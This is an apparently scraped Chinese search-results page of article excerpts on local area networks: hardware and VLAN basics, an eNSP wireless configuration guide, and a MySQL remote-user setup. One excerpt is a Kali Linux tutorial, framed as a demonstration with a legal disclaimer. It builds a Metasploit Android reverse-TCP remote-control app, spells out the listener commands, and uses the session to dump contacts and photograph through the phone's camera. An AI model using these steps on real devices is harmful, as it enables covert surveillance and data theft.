精华内容
下载资源
问答
  • safeshare是基于局域网共享功能开发出来的用户权限管理工具,可以支持用户局域网布置文档管理服务器,创建用户用户使用权限,是局域网办公文档权限管理的神器。
  • 局域网

    千次阅读 2019-08-18 16:10:27
    局域网 局域网接触的硬件、VLAN ※※※ 局域网 局域网 - (LAN) local area network :平时一般接触的网络都是局域网 局域网的组成: 1)Computer    PCs    Servers 2)Interconnections    NICs 网卡    ...

    局域网

    局域网接触的硬件、VLAN

    ※※※ 局域网

    • 局域网 - (LAN) local area network :平时一般接触的网络都是局域网
    • 局域网的组成:
      1)Computer
         PCs
         Servers
      2)Interconnections
         NICs 网卡
         Media 网络连接的媒介通常指网线
      3)Network devices
         Hubs 集线器
         Switches 交换机
         Routers 路由器
      4)Protocols
         Ethernet
         IP
         ARP
         DHCP

    局域网的硬件组成

    网线:

    • (1)Coaxial:同轴线缆(目前已经被淘汰)
         base:基带(数字信号)–适用于局域网传输
         10Base2:最快传输速度10MB/s,每个网段的距离限制为185米–细线缆
         10Base5:最快传输速度10MB/s,最远传输距离500米-粗线缆
         同轴线缆的连接拓扑为总线型拓扑,两端有电阻,以便吸收两端的信号。
    • (2)Twisted-Pair:双绞线
         双绞线:目前一般网线一般是8根线,两根两根线缠在一起的,总共四组;两根缠在一起可抵消电磁干扰
         100BaseT:是一种以100Mbps速率工作的局域网(LAN)标准,它通常被称为快速以太网标准,并使用UTP(非屏蔽双绞线)铜质电缆
         一般的双绞线最大传输距离100米;工作中一般会用交互机在中间将它们连起来,交互机有信号放大的作用。
         UTP(Unshelded):非屏蔽式双绞线
         STP(Shielded):屏蔽式双绞线



    • (3)GBIC :Giga Bitrate Interface Converter的缩写,是将千兆位电信号转换为光信号的接口器件

    网络适配器–网卡

    • Ethernet Evolution
    • LAN 标准

      目前用的是以太网2代,主要解决帧中2个字节为上层协议类型

    冲突检测的载波侦听多路访问CSMA/CD

    • 冲突域:在以太网中,如果某个CSMA/CD网络上的两台计算机在同时通信时会发生冲突,那么这个CSMA/CD网络就是一个冲突域(collision domain)。
    • 解决冲突域:CSMA/CD–冲突检测的载波侦听对路访问:主机通信线侦听,是否有数据传输,backoff等待时间,解决冲突问题。
    • CSMA/CD存在的问题是一个链路中主机越多,发生冲突的概率越大,因此CSMA/CD需要对链路中的主机有一定的限制。(最多1024台主机,早期解决冲突的方法,10MB以内)

    Hub集线器

    • Hub集线器的特点(目前已经被淘汰)
      ①Hub:多端口中继器(中继器:放大信号),工作在物理层
      ②Hub并不记忆报文是由哪个MAC地址发出,哪个MAC地址在Hub的哪个端口
      ③Hub的特点:
         共享带宽
         半双工

      由集线器连接的主机在一个冲突域中。只是将主机进行连接,不能隔断广播也不能隔断冲突域。

    网桥

    • 以太网桥(目前也不用)
      (1)交换式以太网的优势
         ①扩展了网络带宽
         ②分割了网络冲突域,使网络冲突被限制在最小的范围内
         ③交换机作为更加智能的交换设备,能够提供更多用户所要求的功能:优先级、虚拟网、远程检测……

    网桥和交换机的工作原理:
    ①以太网桥监听数据帧中源MAC地址,学习MAC,建立MAC表
    ②对于未知MAC地址,网桥将转发到除接收该帧的端口之外的所有端口
    ③当网桥接到一个数据帧时,如果该帧的目的位于接收端口所在网段上,它就过滤掉该数据帧;如果目的MAC地址在位于另外一个端口,网桥就将该帧转发到该端口
    ④当网桥接到广播帧时候,它立即转发到除接收端口之外的所有其他端口
    总结: 网桥和交换机中有一段内存空间;此内存空间记录的信息是MAC的地址和网桥端口(学习记录信息)。能隔断冲突域,不能隔断广播域(因为截断的流量是根据MAC表,而MAC表与端口对应是根据源MAC地址学习来的,源MAC地址只会出现单播)。

    网桥和交换机的作用: 交换机和网桥可以隔离冲突域,不能隔离广播域和多播/组播。

    交换机和网桥能构建MAC地址与设备端口的对应信息,因此交换机和网桥工作在数据链路层。数据链路层可以识别MAC地址。

    广播域:当其中一台主机向外发广播,另一主机能收到此广播,那么它们属于同一广播域。
    交互机和网桥不能隔离广播和多播/组播。

    集线器Hub和交换机Switch

    • 集线器Hub和交换机Switch
      ①集线器属于OSI的第一层物理层设备,而网桥属于OSI的第二层数据链路层设备
      ②从工作方式来看,集线器是一种广播模式,所有端口在一个冲突域里面。网桥的可以通过端口隔离冲突
      ③Hub是所有共享总线和共享带宽。网桥每个端口占一个带宽
      ④交换机每个端口连接一个网线,每根网线连接一台主机,则一个冲突域只有一台电脑。而且交换机可以同时通信(支持全双工)

    路由器

    • 路由器Router
      路由器的作用:
         ①分隔广播域
         ②选择路由表中到达目标最好的路径
         ③维护和检查路由信息
         ④连接广域网
      路由:把一个数据包从一个设备发送到不同网络里的另一个设备上去。这些工作依靠路由器来完成。路由器只关心网络的状态和决定网络中的最佳路径。路由的实现依靠路由器中的路由表来完成。

    当路由器收到一个主机发的广播或者组播/多播,路由器直接将其抛弃,隔离广播或多/组播;因为路由器中的表格记录(路由表)的是到达某个链路的路径(路由器将网络主机分成了多个链路)

    路由器转发报文依靠路由表,计算机都有路由表;路由表的作用进行路径的选择。

    计算机都有路由表:(后面详细介绍路由表)
        [root@centos7 ~]# route -n 
        Kernel IP routing table
        Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
        0.0.0.0         192.168.38.2    0.0.0.0         UG    100    0        0 ens33
        0.0.0.0         172.18.0.1      0.0.0.0         UG    101    0        0 ens37
        172.18.0.0      0.0.0.0         255.255.0.0     U     101    0        0 ens37
        192.168.38.0    0.0.0.0         255.255.255.0   U     100    0        0 ens33
        192.168.122.0   0.0.0.0         255.255.255.0   U     0      0        0 virbr0
    

    常见的网络设备

    综上:
    网线 – 物理层
    集线器 – 物理层
    网卡 – 数据链路层
    交换机 – 数据链路层
    路由器 – 网络层

    VLAN

    • VLAN(Virtual Local Area Network)的中文名为"虚拟局域网"。
      搜索释义:虚拟局域网(VLAN)是一组逻辑上的设备和用户,这些设备和用户并不受物理位置的限制,可以根据功能、部门及应用等因素将它们组织起来,相互之间的通信就好像它们在同一个网段中一样,由此得名虚拟局域网。VLAN是一种比较新的技术,工作在OSI参考模型的第2层和第3层,一个VLAN就是一个广播域,VLAN之间的通信是通过第3层的路由器来完成的。与传统的局域网技术相比较,VLAN技术更加灵活,它具有以下优点: 网络设备的移动、添加和修改的管理开销减少;可以控制广播活动;可提高网络的安全性。

    • 分隔广播域

    • 安全

    • 灵活管理

    • VLAN = 广播域 = 逻辑网络(subnet) = 网段 = 链路 = 子网

    • 以下是一种场景,对三个部门进行VLAN:

      交互机可以隔离冲突域,不能隔离广播域,但是不是所有的交换机都不能隔离广播域,具有VLAN的交换机可以实现分隔广播域。在同一广播域中通信直接广播,但是若想将同一广播域的某几个主机的通信单独隔离出来,需要路由器,路由器可以做安全策略隔离,但是这样成本有点高。因此在有些交换机中提出VLAN技术,可以在交换机上进行设置,可以将特定的某些端口划分至一个独立的网络中,这就是VLAN,一般一个VLAN有一个独立的标识,使用VLAN可以将企业内部进行部门划分网络以及客人网络域在交换机上配置安全策略,可以保障企业内部的安全。


      VLAN数据帧中用了12bit标识帧属于哪一个VLAN即总共4096个VLAN,已不足以满足使用—云计算。后面将使用XVLAN解决。

    • 在交换机中为了实现容错:会多路连接,但是可能导致回路问题,生成树协议将解决成环问题

    • 将交换机端口与端口对应的主机MAC绑定,有时需要这种情况。还有一种交换机自动学习的功能,第一次一插主机,就自动将主机MAC与交换机端口绑定。(交换机配置)–但一般不这样做,比较麻烦。

    局域网分层架构

    • 分层架构 – 从部署网络设备这个层面来分层的
    • 访问层:实现访问,将网络设备接入至网络中----交换机负责将网络设备连入网络。
    • 分布层:路由器:实现路由和分割网络,实现广播域的控制。
    • 核心层:价格昂贵的交换机,主要作用实现快速转发。(10G以上的带宽) ```
    
    
    展开全文
  • 在局域网共享文件来方便资料和文件但是如果你不想让别人窥探你电脑中的秘密有什么好的方法呢?禁止局域网用户访问电脑可以有效解决这个难题
  • 基于数据挖掘及数据分析的局域网用户网络访问行为审计系统.pdf
  • 经常遭受到一些ARP断网攻击,另外一些电脑用户的电脑也时候会遭受APR攻击,下面为大家介绍下ARP攻击是什么以及ARP断网攻击解决办法
  • ensp模拟器组建无线局域网

    万次阅读 多人点赞 2019-12-04 17:49:47
    ensp模拟器组建无线局域网 (1)搭建AC+FIT AP组网拓扑: <ensp模拟器中使用AC6005、AP2050型号;VLAN 10:用户VLAN 网段 192.168.100.0 /192.168.100.3;VLAN 11:网关VLAN 网段192.168.101.0/192.168.101.254...

    ensp模拟器组建无线局域网

    (1)搭建AC+FIT AP组网拓扑:
    <ensp模拟器中使用AC6005、AP2050型号;VLAN 10:用户VLAN 网段 192.168.100.0 /192.168.100.3;VLAN 11:网关VLAN 网段192.168.101.0/192.168.101.254用于AC与AP之间>
    在这里插入图片描述
    (2)AC上进行VLAN的配置;
    <在系统视图下,创建vlan 10和vlan 11,在系统视图下,进入g0/0/1接口,将接口类型改为trunk口,允许vlan 10 11通过,并将pvid 改为11,将AC与交换机之间连接的接口类型改为access,加入VLAN10>
    配置命令:
    sys /*进入系统视图/
    vlan batch 10 11 /起VLAN10 和11/
    int g0/0/1 /进入g0/0/1接口/
    port link-type trunk /定义接口类型为trunk/
    port trunk allow-pass vlan 10/11 /允许口通过VLAN10和11/
    port trunk pvid vlan 11 /打上标签将接口vlan 1改为vlan 11/
    int g0/0/2
    port link-type access /将接口类型改为access口/
    quit
    vlan 10 /进入vlan 10/
    port g0/0/2 /接口加到VLAN10底下,二层VLAN建立完成/
    quit
    VLAN在这里插入图片描述
    在这里插入图片描述
    (3)配置VLANIF接口DHCP功能;
    <在系统视图下创建一个地址池并命名,将这个地址池的网段和掩码加入进去,然后输入网关和域名解析的地址,激活DHCP,进入vlanif 10和11配置IP地址,AC与AP之间通信地址段为192.168.101.0 24;然后vlanif 10使用全局地址池,给vlanif 11使用接口地址池>
    配置命令:
    ip pool FJP-ip /创建地址池,地址池名为FJP/
    network 192.168.100.0 mask 24 /*地址池内网段为192.168.100.0,掩码为24位 */
    gateway-list 192.168.100.1 /此地址池网关地址为192.168.100.1/
    dns-list 192.168.100.1 /给用户的主要参数地址池,域名解析地址为192.168.100.1/
    dhcp enable /激活dhcp/
    int vlanif 10 /进入三层接口vlanif 10/
    dhcp select alobal /在VLA10中使用地址池,global指用全局地址池192.168.100.0 24/
    ip address 192.168.100.3 24 /配置管理IP地址为192.168.100.3 24/
    quit /返回系统视图/
    int vlanif 11 /进入三层接口vlanif 11/
    ip address 192.168.101.254 24 /配置IP地址为192.168.101.254 24/
    dhcp select interface /在VLAN11中配地址池,interface指使用接口地址池 192.168.101.0 24的地址段/
    quit /返回系统视图/
    在这里插入图片描述

    在这里插入图片描述
    (4)配置AP上线:创建AP组,将AP绑定到AP组中;
    <系统视图下,进入到wlan视图下,配置域管理的名称和国家代码,返回wlan视图,创建ap管理组,将创建的域管理模板加入到ap组里,配置源地址vlanif为11,设置ap认证模式为mac认证,给ap编号输入对应mac地址,给ap命名加入到ap组,统一管理>
    配置命令:
    wlan /进入到wlan视图/
    regulatory-domain-profile name domain-fjp /创建域管理的模板,名称为domain-fjp/
    country-code CN /设置国家代码,CN指中国/
    quit;
    ap-group name apg-FJP /创建ap管理组,命名apg-FJP/
    regulatory-domain-profile domain-fjp /在apg-FJP组内使用域模板/
    Y /确认/
    quit
    capwap source interface vlanif 11 /配置AC源接口,协议在VLAN11中通信/
    wlan
    ap auth-mode mac-auth /ap的认证方式为mac认证/
    ap-id 1 ap-mac 00e0-fc42-1c30 /ap序号为1,Mac地址为AP的真实Mac地址/
    ap-name ap-jf /配名称ap命名为ap-jf/
    ap-group apg-FJP /将此AP加入apg-FJP组中,设置AP的组属性/
    Y
    dis ap all /可以查看配置情况/
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    (5)配置WLAN的业务参数;
    <系统视图下,进入到wlan视图,创建安全模板security,配置wpa2+PSK+AES的安全策略,后创建SSID模板,为SSID命名,然后创建vap业务模板,配置业务数据转发模式,后引用安全模板和SSID模板到ap组里,配置ap组引用vap模板,ap上射频0使用vap模板的配置(若ap上射频0和射频1都使用vap-FJP的配置,则命令为radio all>
    配置命令:
    wlan /进入到wlan视图/
    security-profile name sec-FJP /创建安全模板命名为sec-FJP/
    security wap 2 pass-phrase ******** aes /认证模式为wpa2,共享秘钥****为秘钥,aes为高级加密/
    quit /返回到wlan视图/
    ssid-profile name ssid-FJP /创建ssid模板,命名为ssid-FJP/
    ssis FJP
    quit /返回到wlan视图/
    vap-profile name vap-FJP /创建vap模板命名为vap-FJP/
    forward-mode tunnel /采用隧道的方式转发数据/
    service-vlan vlan-id 10 /指定业务VLAN即用户VLAN为10/
    security-profile sec-FJP /使用sec-FJP安全模板/
    ssid-profile ssid-FJP /引用名为ssid-lhh的SSID模板/
    quit /返回到wlan视图下/
    ap-group name apg-FJP /进入名为apg-FJP的ap组/
    vap-profile vap-FJP wlan 1 radio 0 /*将vap模板引用到ap组里,同时ap上频
    0使用vap模板vap-FJP的配置/
    quit
    quit
    diss vap ssid FJP /查看配置/
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    (6)配置验证,测试无线上网功能。
    <打开设备配置列表,双击输入配置好的秘钥,连接>
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    展开全文
  • 易语言制作 简单的局域网用户管理系统源码
  • 主要介绍了共享文件夹切换用户、win7切换用户访问共享、局域网共享切换用户的方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
  • 在编写一款软件时,用的需要获取局域网内其他用户的ip,本人小白,通过网络查找到的方法,分享出来让不懂的学习,大神绕路,获取局域网用户ip
  • 有些家庭宽带用户 由于用了路由器而成了局域网用户而不能当主机 可以进入路由器 设置dmz主机 实现当主机梦 将自己的电脑 设置成dmz主机方法: 先进 路由器 在ie地址栏 输入 192.168.0.1(也可能是别的ip,具体看你...
  • 局域网lan_什么是局域网(LAN)?

    千次阅读 2020-09-17 06:07:45
    局域网lanPut simply, a Local Area Network (LAN) is a group of computers and other devices that are connected together over a network and are all in the same location—typically within a single ...
    局域网lan

    局域网lan

    Put simply, a Local Area Network (LAN) is a group of computers and other devices that are connected together over a network and are all in the same location—typically within a single building like an office or home. But, let’s take a closer look.

    简而言之,局域网(LAN)是一组计算机和其他设备,这些计算机和其他设备通过网络连接在一起,并且都位于同一位置(通常位于办公室或家庭之类的单个建筑物内)。 但是,让我们仔细看看。

    什么是局域网? (What is a LAN?)

    So we know two things about a LAN just from from the name “Local Area Network”—the devices on them are networked and they’re local. And it’s that local part that really defines a LAN and distinguishes it from other types of networks like Wide Area Networks (WANs) and Metropolitan Area Networks (MANs).

    因此,仅从名称“局域网”就知道LAN的两件事-它们上的设备已联网并且它们是本地的。 真正定义局域网并将其与其他类型的网络(如广域网(WAN)和城域网(MAN))区分开的是本地部分。

    LANs are typically confined within a small area—usually one building, but that’s not a firm requirement. That area might be your home or small business, and it could contain just a few devices. It might also be a much larger area, like an entire office building that contains hundreds or thousands of devices.

    局域网通常被限制在一个很小的区域内(通常是一栋大楼),但这并不是一个严格的要求。 该区域可能是您的家庭或小型企业,并且可能仅包含一些设备。 它也可能是更大的区域,例如包含数百或数千个设备的整个办公大楼。

    But regardless of size, the single defining characteristic of a LAN is that it connects devices that are in a single, limited area.

    但是,无论大小,LAN的唯一定义特征是它连接位于单个有限区域内的设备。

    The advantages of using a LAN are the same advantages as having any devices networked together. Those devices can share a single internet connection, share files with one another, print to shared printers, and so on.

    使用LAN的优点与将任何设备联网在一起的优点相同。 这些设备可以共享一个Internet连接,彼此共享文件,打印到共享打印机等等。

    On bigger LANs, you’ll also find dedicated servers that host services like global user directories, email, and access to other shared company resources.

    在较大的LAN上,您还会找到专用服务器,这些服务器承载诸如全局用户目录,电子邮件以及对其他共享公司资源的访问之类的服务。

    局域网中使用哪些技术? (What Kinds of Technology Are Used in a LAN?)

    The types of technology used in a LAN is really dependent on the number of devices and the services provided on the network. The two basic connection types used on modern LANs—no matter the size—are Ethernet cables and Wi-Fi.

    LAN中使用的技术类型实际上取决于网络上提供的设备数量和服务。 无论大小如何,现代LAN上使用的两种基本连接类型是以太网电缆和Wi-Fi

    On a typical home or small office LAN, you might find a modem that provides an internet connection (and a basic firewall against intrusion from the internet), a router that lets other devices share that connection and connect to one another, and a Wi-Fi access point that lets devices access the network wirelessly. Sometimes, those functions are combined into a single device. For example, many ISPs provide a combination unit that serves as a modem, router, and wireless access point. Sometimes, you might also find devices called switches that let you split up a single Ethernet connection into multiple connection points.

    在典型的家庭或小型办公室LAN上,您可能会找到提供Internet连接的调制解调器(以及用于阻止来自 Internet入侵的基本防火墙),使其他设备共享该连接并相互连接的路由器以及Wi- Fi接入点,使设备可以无线访问网络。 有时,这些功能会组合到一个设备中。 例如,许多ISP提供了一个组合单元,用作调制解调器,路由器无线访问点 。 有时,您可能还会发现称为交换机的设备,这些设备可让您将单个以太网连接拆分为多个连接点。

    2011-11-29_122259

    On bigger LANs, you’ll typically find the same kinds of networking gear, just on a much bigger scale—both in terms of how many devices are used and how powerful they are. Professional routers and switches, for example, might service many more simultaneous connections than their home counterpoints do, provide more robust security and monitoring options, and allow a good bit more customization. Professional level Wi-Fi access points often allow management of many devices from a single interface, and provide better access control.

    在更大的LAN上,通常会发现规模更大得多的相同类型的网络设备-无论是使用多少设备还是功能强大。 例如,专业路由器和交换机可能比其本地对等点提供更多的同时连接服务,提供更强大的安全性和监视选项,并允许更多的自定义。 专业级Wi-Fi接入点通常允许从单个界面管理许多设备,并提供更好的访问控制。

    那么,什么是WAN和MAN? (So, What Are WANs and MANs?)

    Wide Area Networks (WANs) and Metropolitan Area Networks (MANs) are actually pretty similar. You’ll even see the term Campus Area Networks (CANs) popping up occasionally. They are all somewhat overlapping terms, and nobody really agrees on a firm distinction. Essentially, they are networks that connect together multiple LANs.

    广域网(WAN)和城域网(MAN)实际上非常相似。 您甚至会偶尔看到“校园网(CAN)”一词。 它们都是有些重叠的术语,没有人真正同意严格的区分。 本质上,它们是将多个LAN连接在一起的网络。

    For people who do make the distinction, a MAN is a network made up of multiple LANs that are connected together via high speed networks and are all contained within the same city or metropolitan area. A WAN is also made up of multiple LANs, but spans an area greater than a single city and may be connected by different types of technologies, including the internet. And a CAN, of course, is a network made up of multiple LANs that spans a school campus.

    对于确实做到这一点的人来说,MAN是由多个LAN组成的网络,这些LAN通过高速网络连接在一起,并且全部包含在同一城市或大都市区域内。 WAN也由多个LAN组成,但是所覆盖的区域大于单个城市,并且可以通过不同类型的技术(包括Internet)进行连接。 当然,CAN是由跨越整个校园的多个LAN组成的网络。

    Really, though, if you want to just think of all of them as WANs, it’s okay with us.

    但是,确实,如果您只想将它​​们全部视为WAN,那么我们可以接受。

    For a classic example of a WAN, think of a company that has branches in three different locations across the country (or the world). Each location has its own LAN. Those LANs are connected together as part of the same overall network. Maybe they’re connected via dedicated, private connections, or maybe they’re connected together over the internet. The point is that the connection between the LANs is not considered as speedy, reliable, or secure as the connections between devices on the same LAN.

    对于WAN的经典示例,想想一家在全国(或世界)三个不同位置设有分支机构的公司。 每个位置都有自己的局域网。 这些LAN作为同一整体网络的一部分连接在一起。 也许它们是通过专用的专用连接连接的,或者它们是通过Internet连接在一起的。 关键是,局域网之间的连接不像同一个局域网中的设备之间的连接那样被认为是快速,可靠或安全的。

    In fact, the internet itself is just the worlds biggest WAN, connecting together many thousands of LANs across the world.

    实际上,互联网本身就是世界上最大的WAN,将全球成千上万的LAN连接在一起。

    Image Credit: Afif Abd. Halim/Shutterstock and trainman111/Shutterstock

    图片来源: Afif Abd。 哈利姆 /快门和火车司机111 /快门

    翻译自: https://www.howtogeek.com/353283/what-is-a-local-area-network-lan/

    局域网lan

    展开全文
  • 【正式发布版本,清晰无水印】 本标准文件规定了移动用户终端的无线局域网空中接口物理层、功能、性能以及电磁兼容性、电气安全、密码实现、电磁辐射和环境可靠性等技术要求与测试方法。
  • DOS查看局域网用户及剩余ip;看看谁在跟你一起共享网络带宽
  • Kali Linux-MSF远控局域网手机

    万次阅读 多人点赞 2020-02-23 21:41:33
    本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的Android手机,从而实现对受害者手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。 环境说明 ...

    前言

    严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

    本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制程序,然后感染局域网内的Android手机,从而实现对目标手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。

    环境说明

    机器IP地址
    Win10 物理主机192.168.0.105
    Kali 虚拟机192.168.0.199
    honor 8 测试手机192.168.0.107

    Win10主机和手机应连接同一个WIFI,Kali虚拟机安装在VMware中,使用桥接模式使得可配置其IP地址跟物理主机、手机在同一个网段之中,形成一个小局域网。

    关于如何配置虚拟机的IP和网络,请访问另一篇博文:渗透测试-Kali虚拟机

    环境准备

    远控生成

    1、先说点废话,来确认下 Kali 虚拟机配置好的IP地址:
    在这里插入图片描述
    2、在 Kali 终端输入以下命令在 Kali 虚拟机/root路径下生成远控文件520.apk
    在这里插入图片描述

    传输远控

    远控文件已经生成了,但如何从 Kali 虚拟机传输到 Win10 物理主机并进一步传输到受害者手机呢?

    1、使用Xshell远程连接工具,新建如下SFTP协议的文件传输会话:
    在这里插入图片描述

    2、同时配置好与远程 Kali 主机对接的本地文件夹,用于 Win 10 主机传输文件的默认存放路径:
    在这里插入图片描述
    3、输入 kali 主机的账户和密码进行登陆并成功连接后,使用命令get 520.apk从Kali 主机下载远控文件到本地文件夹D:\Code下:
    在这里插入图片描述4、在 Win 10 主机本地文件夹确认下文件是否下载成功:
    在这里插入图片描述

    安装远控

    1、再废话一下,查看并确认华为测试手机的IP地址与 Kali 虚拟机、Win 10主机在同一网段内:
    在这里插入图片描述

    2、在 Kali 虚拟机里查看能否连通手机(这是后续攻击成功的基础):
    在这里插入图片描述
    3、在 Win 10 主机打开QQ程序,向华为手机发送远控文件并安装(这个就不用演示了吧…),安装后如下:
    在这里插入图片描述

    开始测试

    MSF监听

    Kali 终端依次执行以下命令:

    msfconsole                //启动msfconsole
    use exploit/multi/handler //加载模块
    set payload android/meterpreter/reverse_tcp //选择Payload
    set lhost 192.168.0.199  //这里的地址设置成我们刚才生成木马的IP地址
    set lport 9999           //这里的端口设置成刚才我们生成木马所监听的端口
    exploit                  //开始执行漏洞,开始监听,等待手机上线
    

    1、在 Kali 终端输入msfconsole命令启动Metasploit框架:
    在这里插入图片描述
    2、依次以下执行命令加载攻击模块、选择Payload、设置本地监听主机的IP和端口:
    在这里插入图片描述
    3、执行命令exploit,开始执行攻击程序,进入监听状态,等待目标手机上线(用户点击远控程序):
    在这里插入图片描述
    4、此时手动点击刚才手机中安装的MainActivity程序图标(没有界面),则可成功建立攻击会话:
    在这里插入图片描述
    5、此时输入help命令可查看具体的攻击命令和描述,后面将选择几个进行演示:
    在这里插入图片描述

    命令行执行

    成功建立攻击会话后可以对受害者手机进行像Linux主机shell一样对手机进行命令执行操作:
    在这里插入图片描述

    通讯录下载

    1、在攻击会话中执行dump_contacts命令导出受害者手机通讯录里的信息到 Kali 虚拟机/root路径下:
    在这里插入图片描述
    2、在虚拟机中查看一下导出来的通讯录文件:
    在这里插入图片描述

    3、同理可导出受害者手机中的短信记录、通话记录……但是此手机没有插手机卡(穷……),故此处不做演示了。

    摄像机拍摄

    在攻击会话中执行命令webcam_snap ,可开启受害者的摄像头自动拍摄一张照片并保存到Kali 虚拟机中:
    在这里插入图片描述同理还可以非法调用受害者手机的录音功能、屏幕截图功能……

    至此,本次Kali系统生成远控程序后控制局域网内Android手机的演示结束,其他控制操作读者有兴趣的话可自行借助help命令给出的使用命令描述进行体验。

    温馨提醒:此次演示中的远控程序没有图形化界面的伪装,真实的环境中攻击者会将其伪装得跟正常软件一样,这提醒了我们不要轻易安装安全性未知的软件,同时不要轻易连接公共WIFI,让自己的设备暴露在攻击者搭建的局域网下……

    展开全文
  • VLAN(Virtual Local Area Network)即虚拟局域网,是将一个物理的LAN在逻辑上划分成多个广播域的通信技术。 1.1 VLAN的数据帧和传统的以太网数据帧有什么区别呢? 数据帧中的VID(VLAN ID)字段用于标示该数据帧...
  • 比如限制局域网用户在某一时段禁止登录腾讯QQ、禁止访问服务器某文件夹等。但有时这些管理限制又会跟用户带来一些不便,这时要考虑的又是如何突破这些限制;本文所要带给大家的,就是这些方面的内容。  一、限制...
  • 决定局域网特性的三要素是什么

    千次阅读 2020-04-22 18:30:12
     局域网可以实现文件管理、应用软件共享、打印机共享工作组内的日程安排、电子邮件和传真通信服务等功能。学习啦小编为大家整理了局域网特性的相关内容,供大家参考阅读!  局域网的特性的三个要素:  1 传输...
  • 局域网视频点播系统由电影服务器和客户机两部分组成。建立网吧电影系统,主要是为了方便网吧内所需的影音交流,实现网吧电影资源共享。...3、轻松实现业界最为流行的风行视频点播模式,高度优化用户体验。
  • 实现局域网内的多人聊天,基于java socket技术
  • 192.168.135.132是本地局域网中的安装mysql的地址; 分为两步: ① 创建用户; ② 赋予权限; MySQL创建用户和授权 </h1> <div class="clear"></div> <div class="postBody"> ...
  • 主要介绍了php实现获取局域网所有用户的电脑IP和主机名、及mac地址,非常实用,需要的朋友可以参考下
  • 主要介绍了服务器共享文件防删除、服务器共享数据怎样防泄密、如何防止局域网用户删除共享数据,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
  • 可能现在对局域网上网用户限制比较多,比如不能上一些网站,不能玩某些游戏,不能上MSN, 端口限制等等,一般就是通过代理服务器上的软件进行限制,如现在谈的最多的ISA Server 2004,或者是通过硬件防火墙进行过滤...
  • 本文讲的是什么是虚拟局域网(VLAN)?VLAN是什么,【IT168 资讯】虚拟局域网(VLAN),是指网络中的站点不拘泥于所处的物理位置,而可以根据需要灵活地加入不同的逻辑子网中的一种网络技术。 基于交换式以太网的虚拟...
  • 本文通过实例演示局域网用户如何通过帧中继访问Internet 。
  • 局域网用户的限制和反限制.docx
  • 虚拟局域网(VLAN)是一组逻辑上的设备和用户,这些设备和用户并不受物理位置的限制,可以根据功能、部门及应用等因素将它们组织起来,相互之间的通信就好像它们在同一个网段中一样,由此得名虚拟局域网
  • 开放数据库给局域网用户使用,需要创建用户以及开放部分权限。 解决: 1.登录mysql数据库 未设置全局变量需要进入相关路径 cd mysql8.0/bin 登录mysql mysql -u 你的账户名 -p你的密码 2.创建用户,以及开放ip ...
  • 可能现在对局域网上网用户限制比较多,比如不能上一些网站,不能玩某些游戏,不能上MSN, 端口限制等等,一般就是通过代理服务器上的软件进行限制,如现在谈的最多的ISA Server 2004,或者是通过硬件防火墙进行过滤...
  • 10分钟可以构建自己的企业文件服务器系统简单易用 局域网网盘系统使用过程继承Windows资源管理操作使用习惯 用户免培训,自然掌握使用高速文件传输 局域网网盘系统,高速P2P文件传输、支持断点续传、支持妙传文件...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 195,965
精华内容 78,386
关键字:

局域网用户是什么